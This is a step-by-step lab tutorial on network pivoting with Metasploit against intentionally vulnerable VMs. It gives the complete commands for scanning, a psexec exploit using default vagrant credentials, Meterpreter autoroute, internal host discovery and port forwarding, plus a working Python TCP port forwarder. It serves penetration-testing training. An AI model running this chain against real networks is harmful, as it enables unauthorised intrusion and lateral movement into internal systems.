1. Introduction
Pivoting is a crucial technique in penetration testing that allows attackers to access internal networks that are not directly reachable from their attacking machine. This guide covers step-by-step instructions on how to use Metasploit Framework to achieve pivoting, including all necessary commands.

2. Lab Setup
Virtual Machines Required:
- Kali Linux (Attacker Machine)
- Windows (Pivot Machine) – Connected to both DMZ and Internal Network
- Basic Pentesting 1 (Internal Network Machine)
Kali Linux: https://cdimage.kali.org/kali-2025.1a/kali-linux-2025.1a-virtualbox-amd64.7z
Windows: https://drive.google.com/uc?id=1-cDEpDRl5_-QWBU8Ckpp_Zep-1-9-EY4&export=download
Basic Pentesting 1: https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova
Network Configuration:
Network  | IP Range         | Machines
DMZ      | 192.168.56.0/24  | Kali Linux & Windows pivot (Metasploitable-3)
Internal | 192.168.138.0/24 | Windows pivot (Metasploitable-3) & Basic Pentesting 1
The Windows pivot machine (the Metasploitable-3 VM) has an interface in each network. The attacker's Kali Linux machine has access only to the DMZ network, while the target Basic Pentesting 1 machine is in the internal network and not directly accessible.
3. Step-by-Step Exploitation and Pivoting Process
Step 1: Scanning and Identifying the Pivot Host
- Identify live hosts in the DMZ network with an ARP sweep (netdiscover only sees the network Kali is directly attached to):
    netdiscover
- Scan all TCP ports on Metasploitable-3, showing only open ones:
    nmap -p- 192.168.56.101 --open
- Confirm the SMB service and fingerprint the OS through it:
    nmap -p 445 --script smb-os-discovery 192.168.56.101
Step 2: Exploiting the Windows Machine
- Open Metasploit:
    msfconsole
- Select and configure the psexec module to get a Meterpreter session over SMB with the known credentials (RHOSTS is the DMZ address found in Step 1; LHOST can be given as an interface name, which Metasploit resolves to that interface's address):
    use exploit/windows/smb/psexec
    set RHOSTS 192.168.56.101
    set SMBUser vagrant
    set SMBPass vagrant
    set LHOST eth0
    set LPORT 4444
    exploit
- Once the session opens, verify access from the Meterpreter prompt:
    sysinfo
    ipconfig
Expected Output: ipconfig should list two interfaces, one with a 192.168.56.x address (DMZ) and one with a 192.168.138.x address (Internal). This dual-homed host is the pivot.
Step 3: Setting Up Pivoting (Autoroute)
- Background the Meterpreter session to return to the msf prompt:
    background
- List existing sessions and note the session ID (1 here):
    sessions -l
- Use the autoroute module to add a route for the internal network through that session. The SUBNET is the network Kali cannot reach directly (192.168.138.0/24), not the DMZ; traffic from Metasploit modules to any address in that subnet is then tunnelled through session 1:
    use post/multi/manage/autoroute
    set SESSION 1
    set SUBNET 192.168.138.0/24
    run
- Verify the routing table; it should show 192.168.138.0 / 255.255.255.0 with Session 1 as the gateway:
    route print
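To make the routing decision behind autoroute concrete, here is an added Python model of the subnet-to-session table that `route print` displays. It is example code written for this guide, not part of Metasploit; the `route print` layout it renders is an approximation, and the 192.168.138.128/25 entry on a second session is a constructed extra to show longest-prefix matching. It also shows what goes wrong if the DMZ subnet is routed instead of the internal one: a scan of 192.168.138.103 matches no route and would be sent from Kali directly, where it cannot arrive.

```python
import ipaddress


class PivotRouteTable:
    """Toy model of the subnet -> session table that autoroute populates.
    Added example for this guide; not Metasploit's own implementation."""

    def __init__(self):
        self.routes = []  # list of (ip_network, session_id)

    def add(self, subnet, session_id, netmask=None):
        # autoroute accepts CIDR in SUBNET ("192.168.138.0/24") or a separate
        # NETMASK; both forms are normalised to one ip_network here.
        spec = subnet if netmask is None else f"{subnet}/{netmask}"
        self.routes.append((ipaddress.ip_network(spec, strict=False), session_id))

    def lookup(self, dest):
        """Session id that traffic to dest is tunnelled through, or None when
        no route matches (Metasploit then sends the traffic from Kali directly)."""
        ip = ipaddress.ip_address(dest)
        best = None
        for net, sid in self.routes:
            if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)  # most specific (longest prefix) route wins
        return None if best is None else best[1]

    def render(self):
        """Lines in the shape of `route print` (constructed approximation)."""
        rows = ["Subnet             Netmask            Gateway"]
        for net, sid in self.routes:
            rows.append(f"{str(net.network_address):<19}{str(net.netmask):<19}Session {sid}")
        return "\n".join(rows)


def route_for_scan(subnet_as_set, scan_target="192.168.138.103"):
    """Which session carries a scan of scan_target after `set SUBNET <subnet_as_set>`
    on session 1? None means the scan never enters the pivot."""
    table = PivotRouteTable()
    table.add(subnet_as_set, 1)
    return table.lookup(scan_target)


if __name__ == "__main__":
    t = PivotRouteTable()
    t.add("192.168.138.0/24", 1)                     # internal network via session 1
    t.add("192.168.138.128", 2, "255.255.255.128")   # constructed: upper half via session 2
    print(t.render())
    print("192.168.138.103 ->", t.lookup("192.168.138.103"))  # session 1
    print("192.168.138.200 ->", t.lookup("192.168.138.200"))  # session 2 (longer prefix)
    print("192.168.56.101  ->", t.lookup("192.168.56.101"))   # None: DMZ is reached directly
    print("DMZ routed instead of internal ->", route_for_scan("192.168.56.0/24"))  # None
```

The `route_for_scan` helper is the check worth running mentally before Step 4: if the subnet you gave autoroute does not contain the hosts you are about to scan, the route entry is irrelevant and the scan fails silently from Kali's side.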
Step 4: Scanning the Internal Network
- An ARP sweep from Kali only reaches networks Kali is attached to, so it finds DMZ hosts but not internal ones, even with a route in place (ARP is not carried through the session):
    use auxiliary/scanner/discovery/arp_sweep
    set RHOSTS 192.168.138.0/24
    run
- Ping sweep from the pivot host instead: the ping_sweep post module runs inside session 1, so the probes originate on the Windows machine's internal interface and find active internal hosts:
    use post/multi/gather/ping_sweep
    set RHOSTS 192.168.138.0/24
    set SESSION 1
    run
Step 5: Scanning and Exploiting an Internal Host
- Port-scan a discovered internal host with Metasploit's TCP scanner; because of the autoroute entry, each connection is tunnelled through session 1 rather than sent from Kali directly:
    use auxiliary/scanner/portscan/tcp
    set RHOSTS 192.168.138.103
    run
- Any exploit module run against 192.168.138.103 from this point uses the same route.
Step 6: Port Forwarding (Access Internal Services)
- Forward internal services to local ports on Kali from inside the Meterpreter session (-l is the local listening port on Kali, -p the port on the internal host, -r the internal host):
    sessions -i 1
    portfwd add -l 8080 -p 80 -r 192.168.138.103
    portfwd add -l 2222 -p 22 -r 192.168.138.103
- Now the internal web server is reachable at http://127.0.0.1:8080 and its SSH service at 127.0.0.1 port 2222 on Kali; tools that are not Metasploit modules (a browser, ssh) use these local ends, since they know nothing about the autoroute entry.
- A remote desktop service on an internal Windows host is reached the same way: forward its RDP port (3389) to a local port first, then point the client at the local end:
    rdesktop 127.0.0.1
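The following added Python example shows what `portfwd add -l 8080 -p 80 -r 192.168.138.103` sets up: a listener on the attacker's loopback that relays each accepted connection to the internal service. It is example code written for this guide, not Meterpreter's implementation; where Meterpreter carries the remote leg inside the session's channel, this version opens a plain TCP connection to a constructed echo server on loopback that stands in for the internal web server, so everything runs offline. Port 0 is used for the local end so the OS picks a free port.

```python
import socket
import threading


def _relay(src, dst):
    """Copy bytes src -> dst until src sends EOF, then pass the EOF on to dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle_client(client, remote_host, remote_port):
    """One accepted connection: open the remote leg and relay both directions."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()  # internal service unreachable: drop the local client
        return
    remote.settimeout(None)
    back = threading.Thread(target=_relay, args=(remote, client), daemon=True)
    back.start()
    _relay(client, remote)
    back.join()
    client.close()
    remote.close()


class PortForwarder:
    """Local listener relaying every connection to (remote_host, remote_port),
    the role `portfwd add -l <local> -p <remote> -r <host>` plays on Kali.
    Added example; a direct TCP leg replaces the Meterpreter channel."""

    def __init__(self, local_port, remote_host, remote_port, local_host="127.0.0.1"):
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((local_host, local_port))
        self.listener.listen(16)
        self.local_port = self.listener.getsockname()[1]  # real port when 0 was requested
        self.remote = (remote_host, remote_port)
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        self.listener.close()  # accept() then fails, which ends _serve()

    def _serve(self):
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:
                return
            threading.Thread(target=_handle_client, args=(client, *self.remote),
                             daemon=True).start()


def start_echo_service(host="127.0.0.1"):
    """Constructed stand-in for the internal web server: echoes what it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def roundtrip_through_forwarder(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Send payload to the forwarder's local port and return what comes back."""
    service, service_port = start_echo_service()
    fwd = PortForwarder(0, "127.0.0.1", service_port).start()
    try:
        with socket.create_connection(("127.0.0.1", fwd.local_port), timeout=5) as s:
            s.sendall(payload)
            s.shutdown(socket.SHUT_WR)  # signal end of request down the chain
            received = []
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                received.append(chunk)
    finally:
        fwd.stop()
        service.close()
    return b"".join(received)


if __name__ == "__main__":
    print(roundtrip_through_forwarder())
```

The half-close handling in `_relay` is the part worth noticing: a client that finishes its request and shuts down its write side must see the server's EOF propagated back, otherwise a forwarder leaves HTTP/1.0-style exchanges hanging. The same applies to the forwarded SSH port: the local tool sees only 127.0.0.1:2222, so no awareness of the pivot is needed on its side.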

4. Summary & Key Takeaways
- Pivoting allows access to networks that are not directly reachable from the attacker’s machine.
- Metasploit’s autoroute module is used to establish network routes via a compromised host.
- Port forwarding enables access to internal services through a pivot machine.
- Scanning and enumeration of the internal network are crucial before exploitation.
This guide provides a structured approach to pivoting: compromise a dual-homed host, route through its session, enumerate the internal network, and forward the services you need, giving full reach into the internal network through one efficient, tactical penetration testing methodology.